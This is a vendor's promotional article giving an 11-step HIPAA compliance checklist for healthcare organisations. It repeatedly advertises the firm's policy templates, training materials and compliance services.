HIPAA 11 Step Checklist for Covered Entities and Business Associates

Healthcare breaches are seemingly everywhere today, from stolen laptops to cyber-attacks decimating data centers, and it’s only going to get worse as businesses continue to ignore the warning signs being flashed everyday like road hazards on a construction site. Here’s what you need to know about becoming HIPAA compliant – and putting in place I.T. best practices – courtesy of Flat Iron Technologies, LLC, the nation's leading provider of HIPAA policies & compliance templates and toolkits.

HIPAA 11 Step Checklist for Covered Entities and Business Associates

1. Assess Responsibilities: In today’s world of regulatory compliance, it’s now more important than ever to assign roles and responsibilities for HIPAA compliance. After all, without any internal “champions” driving compliance, HIPAA – and any other regulation compliance mandate – would come to an absolute screeching halt. Ask yourself who inside your company has the knowledge and expertise for driving the HIPAA compliance bus? You’ll be surprised at the number of individuals willing to pitch in and make a difference.

If you’re short on staff and need assistance, then simply reach out to a handful of consulting and compliance firms that can assist with all aspects of HIPAA compliance, from performing a readiness assessment to developing policies and procedures, and much more. Remember, it’s not an overnight process, rather, one that takes time and a tremendous amount of effort for getting you where you need to be, so call us at 1-800-554-1829 to learn more about our HIPAA services, along with visiting hipaapolicieandprocedures.com today.

2. Develop Policies and Procedures: Question: What’s the biggest, most difficult, challenging, and time-consuming aspect of becoming compliant with the Health Insurance Portability and Accountability Act (HIPAA)? Answer: You guessed it – HIPAA policies and procedures! After all, who wants to spend endless days and nights authoring policy documentation for regulatory compliance – not you – so do what other companies have been doing, that’s downloading the HIPAA Policy Packets today from hipaapoliciesandprocedures.com. In fact, developing policies and procedures is often the most demanding and time-consuming process when it comes to HIPAA compliance, so “going it alone” and trying to develop the documents from scratch is an incredibly large effort, one where the failure rate is very high indeed. Whatever the industry, from pharmaceutical companies to managed care for senior citizens, we have the very best documentation available for instant download today at hipaapoliciesandprocedures.com.

3. Acquire Necessary Security Tools: From File Integrity Monitoring (FIM) to anti-virus software, Intrusion Detection Systems (IDS) – and much more – compliance with HIPAA ultimately means obtaining various software and other security related tools for creating a true defense-in-depth and layered security. After all, many of the HIPAA mandates – when adjusted for modern-day information security best practices – simply cannot be met without such tools. What products do you need? What vendors should you be speaking with? Are there free and open source tools to be had? Good questions for which you need answers on, and we can help.

4. Implement Security Awareness Training: While security awareness training is a rigid mandate for HIPAA compliance – and rightfully so, as training employees on critical security issues just makes sense – it also creates a high degree of employee awareness in today’s world of growing cybersecurity threats and challenges. Remember, employees are still your best weapon when it comes to protecting one’s organizational assets. Look, all the security products in the world mean essentially nothing – your firewalls, anti-virus, intrusion detection systems, and others – if you don’t have knowledgeable and well-trained employees who truly understand today’s growing cybersecurity threats and challenges.

Training employees on today’s security threats –and best practices – is absolutely essential, and it’s why we offer two (2) options: First, a 52 page training manual, and second, a PowerPoint slide presentation for group training. Security awareness training should be efficient, cost-effective and highly valuable, and that’s exactly what we offer. Visit hipaapoliciesandprocedures.com today for downloading high-quality and easy-to-use security awareness training documentation.

5. Undertake an Annual Risk Assessment: Assessing risk is becoming a common theme in today’s work of regulatory compliance. Sure, it’s a mandate and must be done, but more than that, it’s a best practice that just makes a lot of sense. Don’t you think it’s a good idea to assess critical organizational-wide risks on a regular basis, those that can impact your business for both the short-term and long-term? Of course it is, and it’s why we offer a comprehensive, easy-to-use risk assessment program available for instant download today.

Managing risks in today’s hostile and ever-changing world is fast becoming one of the most important initiatives any business can do, and it’s therefore critically important to perform an annual risk assessment each calendar year. And remember this, it doesn’t have to be some laborious academic exercise – not at all – simply use our industry leading documentation that allows you to pick and choose from a wide selection of risk topics and categories. From information security risks to market risks, credit risks, financial risks – and many others – there’s a wide variety of risk topics to consider when performing your annual risk assessment.

6. Assess Third Party Security and Compliance: We live in a world of constant outsourcing, where one company is providing services to another, and that means certain due-diligence measures need to be in place for ensuring the safety and security of PHI. Ask yourself this: What services are we outsourcing, and what specific rights to such providers have when it comes to accessing our information systems that may contain PHI, or have the ability to impact the safety and security of PHI? You may be surprised at your answers!

7. Time for a Culture Change: Hey, nobody likes change – we get it – but when it comes to the strict regulatory compliance requirements being placed on businesses in today’s world, change HAS to happen, no question about it. For HIPAA, it means following policies and procedures, undertaking risk assessment training – effectively doing all the things that need to be done for ensuring HIPAA compliance. It all starts by obtaining the very best policy templates for HIPAA compliance, which we offer for instant download today at hipaapoliciesandprocedures.com.

8. HIPAA is a Moving Target: And a moving target – particularly in today’s world of regulatory compliance – can be incredibly difficult to hit if you’re not working towards HIPAA compliance on an annual basis. Remember, HIPAA is not a “one and done” activity – not at all – it requires constant attention and dedication throughout the years – essentially doing everything you can to ensure the safety of Protected Health Information (PHI). It’s extremely difficult – almost impossible – to be 100% compliant 100% of the time, we more than understand, but that’s exactly why you have to keep aiming for the HIPAA target all the time.

9. Have a HIPAA Champion: Anything in life that requires change means there has to be a culture shift – more specifically – people have to want to change their outlook and how they do certain things on a daily basis. For HIPAA compliance, businesses need a major culture change – specifically – they need to understand the importance of protecting PHI and what controls need to be in place. Ultimately, this requires an internal “champion”, a true advocate for HIPAA compliance.

10. Practice what you Preach: Hey, talk is cheap – as the old saying goes – so it’s important to practice what you preach, which means that your policies and procedures are not just printed words on a document, they’re the standard for which all employees must follow and adhere to. This can take some time getting used to as a true cultural change will have to happen, but it’s got to be done for ensuring compliance with HIPAA, not to mention, it just makes sense from a best practice perspective in today’ digital world we all live in. Visit hipaapoliciesandprocedures.com to learn more about the very best healthcare compliance documentation found anywhere today.

11. Continuous Monitoring is a Must: Assessing, enhancing, and making changes to one’s internal control environment as necessary is what “continuous monitoring” implies. It’s about ensuring that your internal control policies, procedures, and processes are in good working order for helping protect organizational assets. With data breaches occurring at an alarming rate in today’s digital society, you’ve got to be doing all you can in protecting PHI and other highly confidential patient data. Continuous monitoring requires a true ideological shift in how companies work and operate – thus, it’s not an overnight process – but one when implemented, yields significant results.

Lastly, you may very well find yourself having to validate or show proof of HIPAA compliance. This can be successfully achieved with the following three (3) reporting options:

1. HIPAA AUP Assessment: An “AUP” is an agreed upon procedure performed by a Certified Public Accounting (CPA) firm that allows for specific subject matter – such as HIPAA – to be assessed against standardized audit and assessment practices. 

2. SOC 2 Audit with HIPAA Provisions: The Service Organization Reports (SOC) platform, put forth by the American Institute of Certified Public Accountants (AICPA) is one of the most widely recognized third-party assessment frameworks used for evaluating an organization’s internal controls. As such, HIPAA compliance for both the Security Rule and Privacy Rule can be thoroughly assessed via a SOC 2 audit. With two (2) types of SOC 2 audits – SOC 2 Type 1 and SOC 2 Typ3 – healthcare providers can provide assurances of their internal controls relating to HIPAA with the globally accepted SOC reporting platform. 

3. SOC 2 Audit covering HIPAA/HITRUST Provisions: The HITRUST provisions are probably the most in-depth and demanding mandates when it comes to regulatory compliance for the healthcare industry, and that’s because the actual HITRUST framework is extremely comprehensive. Therefore, undertaking HITRUST compliance via a SOC 2 assessment will no doubt incorporate a large number of mandated HIPAA compliance requirements, thus allowing to you effectively comply with the Health Insurance Portability and Accountability Act provisions.